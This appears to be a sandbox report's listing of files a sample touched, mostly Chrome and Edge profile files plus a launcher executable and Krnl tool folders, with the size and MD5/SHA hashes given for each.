C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
4538d81483250ac59e9ae62620c2e58c

SHA1
c3f9b9f28fe05472fda3ebb9e07ff097a08b02e4

SHA256
5af9e4d0ddcdd332e528479d2f0658a89f2d2e366f11734ca8fcad5ba7bbcf07

SHA512
548a63bd38f5ec62eab881eae239c9a9fe448c86b4ca50ebfea2c879bb87a84c05c32cc03867bc9a74e8ec1f21c50ce6dd116c42c8f1980ea6db331aae1ed78f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
25e2dfda018387985545f749ae2594ca

SHA1
a864c15573defa2f13bbce8a57656592e64b8f5f

SHA256
959bd6fe2c918a22c039d0c38d822f8bdeb1e31d18db6f58aba03c54f8605a13

SHA512
541b660e20aefcd96a0070a343d8b0363049e690328c5c265fea382430643c4c9aa6d8885de4e93272901c8be8bf6ef688fdcfd0d94ce8c9480cd422160c36b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
2978d02b0afae5b5faca308e41cc3fcc

SHA1
5314be497d918345253871a3dd9c739c7f4ee4eb

SHA256
51f2cabf5b3c152701a03109bad28ab10d23f542fd91b0def80dcb90a88b9889

SHA512
d488d3afa9f2f495911489092c1d1b1a8ed50163b5495db9548bd63d424afd42d5149b9f03b3989c280b6e3c0ce5fb3b5cbc3eb3383a7448d78d33da4e5a09c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
443a3f08c8904ea4816498b761d536b6

SHA1
6269ec67be3f88c38e061f7ae994b902817f73f5

SHA256
39d66102cc778ef7efd2e1b0670c5be0234bc85ba6576b686d17b7be09845a9d

SHA512
908c5c32354caf843e33dfe906ba993cfdf2d2f2aec2866032cc6fb5e7ee12f2f38648e0fc3418ba7f912e2a1b5e2116f669ea5532857c377f28599eb3066d8e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
e49712cc4eb952ddb51ba7cc95444f1a

SHA1
a3cc6c3029f0045eab34838a6ceadd3c5628e113

SHA256
24802d7b3c3533bdee072d6ed69991b78631a77a8a28435b5f7c8ec787a5332f

SHA512
eadcc2c02f5110a07c34ca219574f2e8afa4c54d9eeac5bef27d4887e4830aa8be438676d2f7cb88aeaa9eeb666ea653bce43cadb6e8e121789a8eaeaf8b2825

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
e5d97c61b73f6290304b1be5904dfc1f

SHA1
0a9d5edf5eccf62f0a9abf8975ae9929d0453912

SHA256
e8c6e61e908f09f56e8cf8a7e63416196d2cea005d548c7e18f333ee1dc60bff

SHA512
055bd1f20b3023c70673eb912f257006f06f98851618ffe64f85cc903c02483d8b3545fe2af86f64c8d35f01ab94e7bcf7b5cc9a235fec820d108b9cefd96794

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
c81797ff08f6897f8e1166ca25ff29a3

SHA1
bbe1b1b8710a01b7a3ac9b8931cbef85ae4a6435

SHA256
07c92062ea618b599ae35e0c585602bda1203c6d67654770b8d671bc32b11066

SHA512
8d36be63e014b0b9c2d8c9f22f825cedef3818cee9b4e6d580411b13e4f58f03aca4fd21b14ef4fa26f30f1fd7f35a9009c8aa32df7124a2811905bfef40d3fb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
acfb1b7b5b81bd51f6cf0bd55170d1c6

SHA1
e7efde2b8853d375eb94f74ca50e157c23bcb004

SHA256
3030b052f236dc74e5d0cab073799a81b348486527e62ada04ba385c843de8b5

SHA512
1f0d49b4102707d8f3298c665bd82bdb830971587fd76815ee8996b3f7e5761ae178b3a58dcd2563ceefe4c320632eec5a7f4eab619bed214893da42b96f1af6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
55cc3e37f7b780e39ddf7b833cac5534

SHA1
c8a1a7692e8c9341028b540892d2e34d55bcc4d7

SHA256
7b7dbd4e90127983c805b582a0ce5f4dcc0b0755c4841402656b75f0fa594955

SHA512
e99fe0e49e8859adcfa646e30681825e9f90d52e77f7589497531a229996305e40a6c5021947589030796057478335ad9b0f45674723c985e6c015d3dee8007e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
f529bc14309516c120cafb2b950f47ce

SHA1
730c4e2ebb66132281ecaf68e449793fa790d567

SHA256
ccff8d547c27b6be3661a62126596d6229067944840fdb0e8d7e7addbc9d5cb0

SHA512
e684dc0977a0cad8530a44ee0c95ac470b7a6dee6113f6fb0320f00ad19ab482d5b05370a925cf5f0b6b24ce9ce071e87cacb3f470c463ff80e562754c2f72c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
6c17fc1ed0a6e42e11c6b79f146a6ae7

SHA1
9b6aba13b98878f74f5d8e7f6c79bb4794665046

SHA256
f79e30c4264dbb54cf3b67980c170b2e17639008e06fb297fa5f9ddfb01e3cc5

SHA512
9ad2d138f80c228ae1b344815bdd106f1df5c27a0d653003f3a3120e5c38ea6b95968f78a1886443a7aba0a3ed4083fcb5611aa89f7456279115545c49f8c226

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
7ce3fb765f3a4fecff1f23a90e83c41c

SHA1
3f169f05b7b27f0a13c5571803c59d2ee8d9edcc

SHA256
47dea23ca1ce83104f8a7864d732cdd6aca0f3dc5eea3311f71ac5b14c726b89

SHA512
305482eaa5db83145677fb08d3794852b4ffca970f50034f20bcdc99a9b5f6d7ead9930fdf385a322fc21d87395e6c3d0e2bfe60b601b2a74e5c5a2f24295329

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
a8949e1af7c2a24c7842848ca64c436f

SHA1
835c41f76cf32eaf20e8d0a4e3ca040b3e42130d

SHA256
28beabc6b14d95a0dd401710be68e3797fba6178769a4e33a47860c24e12bf98

SHA512
1a08bf8bd54d39b1bc5a0bf2c2cbd9b608183f236116304574968831ac005be3c9a1d135d31adbfa02b2f413fafce6942ddb4168d2290dd49bfcddfd2ea8ea66

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
bcb4e580faf2fb2bf7b7d82de4daee00

SHA1
a73802b82f0121ba2edcc0c2fc3d1cd54c267ce9

SHA256
9c7a53ed6c10442c2523bb6ba7f6fad98bf7dfe8ce6b8a77587f937492b17f4b

SHA512
1b08c06b797f0304841d550508938503d278e4ba344f994a293b800b4de2af511d32c83050e3cac037470ba271dc0253db4adffdc4ae88aa2ddec72d1a5b9369

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
a7aa925512d5b21ee08b06c1626e93b3

SHA1
ebdc1886d933f3a78aae2a0ec31217de52df95e8

SHA256
dc11fb2ea39fe5617f0d061949421003992c0126e659ad3f6ab26c70302ddc26

SHA512
2b60bb57f5e1a883b7bad7e8eea7311e8c1d7daa2c5892360e08ee6a12d709afd9361d3bb7e2bd8fb42425dcf6a5a0c38ae9ae00e9c21a5ffa0f9504caf7fc0b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
981e9ed06a57065c0684f60b76c730bb

SHA1
bf2b03fb75f6aa79b40ee90a6ec42ad50f66296b

SHA256
a3f89e55ef120d9d5c5d7734b901a16db01ec206021c223e3142cb3a5349db09

SHA512
5a964d37f79b188ce98db25234efb47336c664971eb400d67fc8652bfb0397631d832204ca9d88f7af10f374044c835106ab5a48c6f53c6a6acdc6e6aca55c93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
59385229cfb5bf7dad20460aa36e3e9a

SHA1
f74903f211bd8654613843763c232b38384b9c05

SHA256
9217aee41742303eca46ae7228e0828166c3bf02071d398cfd8f3e57fd575378

SHA512
01a7fe6ace0c7e7eddef6013d5a3453679fe3a8d289b7481c9dacc62694fa76c40e529bd5a501f4430166cafda51d545737d4221c4c4d23927caa31bedf43902

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
6795cb22abbdef959ce262eef96c3ba1

SHA1
029ab5ddb93af7c0a1fffc25b7a0066225ff8aa4

SHA256
83cc71c7aca84edd041d8be4cc9a66e4ce05deee8a89fc1d54b76ae927abc9fc

SHA512
fcfd68bf11c2b18ce07dfe5ee6296d38c9513b3fd23b07ba9003e99c7eb6116461e73ced7701d705ffcf24a3921aea5d47eb1f73a326246376663c21fe0c5b35

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
c7b19b7f9358edc1f4e2fe5677081baa

SHA1
e7eb220fb6cc8ebe9f5770fd68f85886b5f703e0

SHA256
a6c631abd40b23039b3ff02490bc913b59d33bf044e6b478e08a1e582f3f7507

SHA512
2ca7762f973281059afa8c374b6e441542d8f45176066c32b3d00904005816b7b2c31a0116da909b10932909f961089683199c36203659846c8aaee3f11cb36b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
1f5b993f4ff4c06ec2eb5d0fe1819fb8

SHA1
b6b820f10c7e83eb751ad4fee4dfa78cc26b514e

SHA256
c07cbf8d23c91a988dea596ce9643f98271103710810d6b034686dc696567329

SHA512
4c7d5a26876ec0f682513743de929487449da402e73e2a4c6efe99a710e1907c8be67a21b5695e257e041cad32b6fbdc2b878c13b70baaf373d77eea821301ce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
a253616f74255acd5688102b315c4a3b

SHA1
7c4a4b573e62cc4aece937c706b32df3c7a896f8

SHA256
3a37977cbc29d607f707ba7016b2aab2c86abd5ad639b8dfd46a4e31e70b9074

SHA512
c31199fc5f152f0cec96e37cdc50aa8ba5888b556b57aefeee4621e56dd9432d9458b1d0b2085f1f65ada766195de726be9291aa8c92e552301c7e67fa1d1203

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
94fd0c0b08aa7c0f6c1fdba40dc6dc20

SHA1
6ca286821b5c9d65fa6f5f8c6a2a1d833ad006f0

SHA256
2792be04c7132dc7ae4ddd5a72754efc59594d74da496011461c0c5b4e8cc5b4

SHA512
b7ede289f1438845386eea9070df416d4cb942a9bddedb77f8addc6399319e722c6fb66bbe7c9cf390bd32dbb68abc3f587a07c7ffb7087cc5592fd18cd0fed7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
d4f7109e245750894d11afed1203a0d4

SHA1
5991c29d86fe96417866d43e2f1a8f05e0057f58

SHA256
d6f2547fb1310d20cbe5ca8e22c413ba47e3131d4dd7727a1d51d59f8891f20b

SHA512
ffd385671e9133c7526e04bbcfbe9b5536b0f6fc76d9368a6ce56e44ce2a31cdb2d0667065d53c806fc527426231790902da17eba15d74d4a884255ef0113329

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
2fb3489fe96c85b3a0ec2b4135c4650b

SHA1
5ff90395fa23028ba05d4d0265992c4003cee362

SHA256
e054b7bcec6391e26ea8b8da65d5ea28a6d1faf9dedd2dc1692fe107a76c480c

SHA512
e405d57e1cc9cc9a4dfae2db22701d62355470cdc019261740cba7a6f995b15a83452c76c9f3fa4d29ca4caf14094418b60b57a64fc95ac0cc049a373845f1ac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
5ef2cf3f766320bd1d820d9379babdfa

SHA1
5b26a2983491b4f90e8b92de14bcdc3353f12507

SHA256
f6c2fe73cb8a33799587199dc67751a83028931eba9945de04abaf3ceb7e82ec

SHA512
2b39017fa0e2bed54334ce75b4fe2b112caf4f58ef983f4089538f5b5db54c7feb0efbe541cd4efe2198d00c9153b1e17835e47d33a371eb603fb36ce7f6d566

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1c4015a2a86a57fc144495624615c2a2

SHA1
ee18cfce9dfc2749de80d08bacc1b75fa8e5e762

SHA256
5d0a23347a0b41aec00569a4c36523e0d0d1b9b9bcf54b35c30fc16b158d24fa

SHA512
42689360df9bad90b065202552f3f2494771f1ed214f4a27c6b479ca75649d05f4b9204dc7bc13e23938699b12e8c21cfcf0fda37242ba5ab08d3ec8ee61d85f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
59901c9e99913f83d2c203d89f9631e3

SHA1
b2c876d639c6539b71cf65c783662ac2f538c091

SHA256
e288761a3b28ab94860ff025d77fb89ce1a73d45f1432a7fd53473f2f8868c64

SHA512
17b8f8333161fce5d58fa0917da77389add96d877211edd7f5e9d9294f9f85b39054bd9f2238b4c595ec96d9722f41b0dea0919633115e2da2e628025b29e849

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
3d53523e1d404c3fc441af9efba98300

SHA1
e1b1765f279367099c73aaa86345030811ebd41f

SHA256
9baaf3af15e1b532b97c8b14ee889b791f620f19e495868d07f20eb7c52eb51c

SHA512
7a050d0a0d5b733aebddcfda2d32af327b93608590e65f3fe625707664a68425debf995426a1f60a9bbb339fb579f988362011385c3cb4ac0d7531cfc6491f62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
5965b5f1473f39067e9a43bf628c2079

SHA1
edec47a50bd5eb28bb457e5150455a7a3bccde90

SHA256
e8bfd4ade3618fde50b5ba8deddc068d789733b389259c7654e937afa55d885e

SHA512
c8bf5a62de5781eed16691bd443b8b66cdf9a94b89867f0da3db995155ab56e55227e502a59038296dcd4a37fff42542131c69bc49ca60ea4db26ac0553bd2bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
98774e56576f7b1ab65cf0e00f0e8aa6

SHA1
9f5eb432807a76f171dc407550905d4c05187398

SHA256
030b273da8922d17e3475f7e8dabd3373f20ed2c6cfb0efe295063d9679526d9

SHA512
78cb09c2c15d3d1b442c7a1082bd17e88099fdc006a71bf55a4c35f6d56d38996b606239e1e6e38fc649a345ddd048f5c356dc5a588185096ccf32e65124d165

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
07961430bf23f3762b38ac187e2bc207

SHA1
896eb74425e30559963946b97912c3e80bea4a28

SHA256
b7dc8e690ca18d5a49ecd72265d545c2c2968f24bcddbdef3c151564582ec23a

SHA512
90c466e92d8afa462e4eeb7408b5f918f0eabcc568341c2f388651ea5564c1f2589d0d178a6b1b0f4a270092be870ab18fabf9daceee766c3ddbccc3b870dd19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
ebca3913f23be6dca2c4e274c280e53d

SHA1
9cd236020ff89beca319937821f0d4e818ba5397

SHA256
ff4927929a3c374cb75ea37beda3333bf7b4489d1666197c8dbe3f6bbe0efe04

SHA512
4bb5ad72584720f79a2e2934c0ca7a594a9692b8c9568fa24f23dce0e61be2acf05f995fef9cd11691f37895de0e8f391a1430ce54252a670c211d9beab194ac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt.tmp

Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5895a4.TMP

Filesize
120B

MD5
cbe550ba810069917d77caf569a32fda

SHA1
cbf802e09c6a44be7740cb86914945e4ef4dc87e

SHA256
88e273d729ff9f57ef1e44c3ddddc73938f333befbee18a28599de8bbd38bf04

SHA512
89ed6ce3be79ca9665a2de29af16a85400cf8502e90e79793f5a3374ed080a966e4dd51747e5b9d2a2fd2513e6d3a74d230ca9712f26c2c2f7d10a05e20de85e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
173KB

MD5
2643759397999f50bb3cbb71857bf09f

SHA1
a366df514be91a7b5d6bf572d9aeb38127573182

SHA256
ca349f0edf0397ca537f6e1fb4d6914632efd6e362402b637dacba48534a6786

SHA512
188c38f9cae106635b2e1eda842aec3ab7a394e883d81815af63c8debe032e62c6d5280cc5912b0709b01864da890e45b3fb9ddb2cbd12d626db141a4ce95a14

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
173KB

MD5
2c8004bc03905fcffedf8311a9755475

SHA1
cd7199d169a0c8501cf92b177867ed4d7a20f451

SHA256
de251a399ade7110559eb56cd1e57db003dc82f7f5a81df9cc8b895bc7a55ce5

SHA512
e79e1edc67848415d54f27bdae3b01825e947359c4be040dfd976720b69ad3ab924e98513d5681ed1fd599990c68911b244507448152bbd9454492012dd65059

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
110KB

MD5
5631d36fdf9b2b9b83eac0d24088f65b

SHA1
e9b5429f52adf9a6020bb12fe1e7f69efe6e0238

SHA256
0a54b0c2f29eb8ef843b04167cf7e83624b41c2119bb460f904629d67ace40ba

SHA512
fd4a8cb5a7876516f09b20515f749ec391d34573acd448603ccfcc56dbcf3d99738599f0944933f68b404a7a4cca382315a53ca013864e833898e6a30b08b5aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
116KB

MD5
893506cb2dd71760b6cee806e3775bc2

SHA1
b0d1d84a375bf363c4f8416b19d919ddc5103c23

SHA256
af7666b7bc1db7641f54c70c88f5af5a104c4e56fd978229b4fe8c498908fa55

SHA512
91a57896d885760834fad68a1e77e84fb3d22701c2efcecbd8c72996e762a8d4fd6e38ec8d21e5f1b1efbb03a3dac8b40488001bf4fd1b834db55edb5e3eba8c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
117KB

MD5
52711ca4a2f60c50a9767bc2e44279e7

SHA1
7aedba3d3f20a61fbce4e88fa6be7faef758df3e

SHA256
c9f1c29c300f2dc17a7a4b6fa5e6d32ffed153dfc3cf1593147d2554965baa3f

SHA512
febff8fbff615f9dc53547427e59ab9e14e3e59dd9e766e7ec8741dea89139c81b76de43ae7df397f36a392b67cef57bb678146aa14150712d608677a686b195

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe572eff.TMP

Filesize
108KB

MD5
74935594dde54d0f83a0a6b6ab11db10

SHA1
0f3e70a57363984c62e36768dc3b4ea4f622d8c2

SHA256
2e79b09e3e547aabdcf2760eaf142e80ef6875b225083c9d33429dbc08b18eae

SHA512
04c913ff1c0e64f7caa670c3f7f18cfa4ffd1a496c5547d46ab6ffa2880714c3e12ac5011417681887e22ee222f2c59b1ca7046258ce1106c7dc3555f4d7442a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aaeb1f5e097ab38083674077b84b8ed6

SHA1
7d9191cb2277c30f1147c9d29d75fc8e6aa0a4f2

SHA256
1654b27bfaeee49bfe56e0c4c0303418f4887f3ea1933f03cafce10352321aef

SHA512
130f1b62134626959f69b13e33c42c3182e343d7f0a5b6291f7bb0c2f64b60885f5e6331e1866a4944e9b7b2e49fe798e073316fde23927ede2c348ba0e56eda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1db53baf44edd6b1bc2b7576e2f01e12

SHA1
e35739fa87978775dcb3d8df5c8d2063631fa8df

SHA256
0d73ba3eea4c552ce3ffa767e4cd5fff4e459e543756987ab5d55f1e6d963f48

SHA512
84f544858803ac14bac962d2df1dbc7ed6e1134ecf16d242d7ee7316648b56b5bc095241363837bf0bf0afd16ca7deebe7afb7d40057604acbf09821fd5a9912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7dc30b35-02d9-467d-9a0b-74770af62005.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk

Filesize
2KB

MD5
1040ba23c19dae2d141ab2e14aebc4c8

SHA1
61b0c469e536f1d3ab93f411666ccede751c2466

SHA256
74c0315213c48850d069f3f2c8d449c20ef46bd9b44e852118654a65d2794341

SHA512
6335f16bb705c03c5f21bf94fe1582fb71f22ee87c5e5ad10b47131f69b505cdd99b6e6c0d7d6e01392b2e2cca97e714d6defb80eedf91b8c9df188f0d4f4724

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
3KB

MD5
4d215217b2dc7ab373d8e28ced316494

SHA1
c50085cbb139c10a43d68c6492cb0645d1dc836a

SHA256
1bd94db882c89ff5f616c5223e8e0fd12876ee5eae4ca928265e5af55c2f3e17

SHA512
1db9a67f6b8b7ea3cdfdfef3b5534d7c309c0c28801bd8a6b3ca817f12f20bebab934774ac3410aec1d0d6609caf590267734ca4839730185c403de9b78cf7a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
d75e1ae6baba9e1b9f22e37c321ae2a9

SHA1
13fed513a86b54d048af8d05cdaf37a50bd24b8a

SHA256
966b7eb27fc3bff262ca4ba9eddd6ec74aed5e779a7b1bc44474d0b8cc2f81d3

SHA512
161dba015528afdcbd67a57b11ed317683d113ea277dc158cbf60fca3237ffcfb092186b76a4f09cb84f02bc7e688efdb7c110d438abb265a0dbc2eb07568ded

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
4cde866d49ec58d86bed823613db64bc

SHA1
40e18c9dfe1441322011ec3b2f8ebac35477952c

SHA256
80fe9957c866e8707e6070dc2f670489507f5975b0ebb315fa1219d867dd6eea

SHA512
25d5544132779d0a5a172fd9794b4100ff8af486e12f8cb1dd76e04f7943bf568fbc89f74dc9dc4cb96243904d5a93a70328f1c68804cae3ab28600ead75b6a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
f6b5c57ef48be06bd00a76ac33f27035

SHA1
8dcea76b0e3d94eb6c92db9d0ec8727f5c3421a1

SHA256
96b32429e5ec6b669736351616bac3c74adcd4a67e97df8cb914608c6de32801

SHA512
30603f520ab404e432817751c58810d58d7db41f5821b63a509c957329ba0866bbd8f790a04c8f832b6ee6439ca831a2b9a1d41f3f7ecd2973a0fa698c897de8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\460_382287780\LICENSE

Filesize
473B

MD5
f6719687bed7403612eaed0b191eb4a9

SHA1
dd03919750e45507743bd089a659e8efcefa7af1

SHA256
afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59

SHA512
dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56

Download Submit
C:\Users\Admin\AppData\Local\Temp\460_382287780\manifest.json

Filesize
984B

MD5
59741ca0b4ed8f06f8984e5c91747a4a

SHA1
334c396dd6e710de0e5b82b93cfaba764abc0331

SHA256
8dabab92309c13bbbf130183e757967bb1d80b47d06d678d12bd7009bc4e0dd7

SHA512
9ff5db978545120a033f5899444cfce08fbb3bb68afd3ca4be394adf781f42c8689c3a2a3d929c0d391a7902315e2073509eb5f8344b96e186b1a63f35d565c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zOC103392A\jklLauncher.exe

Filesize
178KB

MD5
1b0b6f1813c45292463f9ddf3ef070ad

SHA1
a837cb0f6d73dd79338368fbe4ed8491a046a910

SHA256
46309c9aa3e727871e4df2e89f5e350d1a51cd9652cd298c5f6fb9bde70e6314

SHA512
c7cd46cd3df2c8422c652a7773a6919357e170302a366b44bae9b5cfa61d51ad7cf14dde7146b9705a97f779828d51076bdb6d367f15a6f7dfaebbd451b716d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_susk04e0.efh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Community\Cmdx\preview.png

Filesize
155KB

MD5
971fcb67b3ed9746cfd5c12032c8f54a

SHA1
378d56a2909c9b4dacc1a679664de7a3b9b48109

SHA256
94d47c3270fd8af9431722aac704778dd0e157fcffe7e24435a25368272e6bfc

SHA512
3d5e2f7112462049cd84fabce244cd51cbc341e8adc4fa27e5516855dd6f1d9727d6dde463812f6c552a732ebb2dad87ea6eed38a9bf7a1ea55800068fecfa63

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\7z.NET.dll

Filesize
15KB

MD5
982475050787051658abd42e890a2469

SHA1
d955e35355e33a9837d00e78c824f6e5792b47f3

SHA256
4e193ccda4ef7ec7fc1bc12d7abba225a9af5b4612aa0b67a02324b9da8b268c

SHA512
c97b40c82499759e8a11b581004252be618f967153b5a9ce425f9a385746f3a1bdc467686023f36ed11212ea23e1c6b03b4df32cc5dd2a8c4b1d4ab23541c1f6

Download Submit
C:\Users\Admin\AppData\Roaming\Krnl\Data\7z.NET.dll

Filesize
15KB

MD5
982475050787051658abd42e890a2469

SHA1
d955e35355e33a9837d00e78c824f6e5792b47f3

SHA256
4e193ccda4ef7ec7fc1bc12d7abba225a9af5b4612aa0b67a02324b9da8b268c

SHA512
c97b40c82499759e8a11b581004252be618f967153b5a9ce425f9a385746f3a1bdc467686023f36ed11212ea23e1c6b03b4df32cc5dd2a8c4b1d4ab23541c1f6

Download Submit
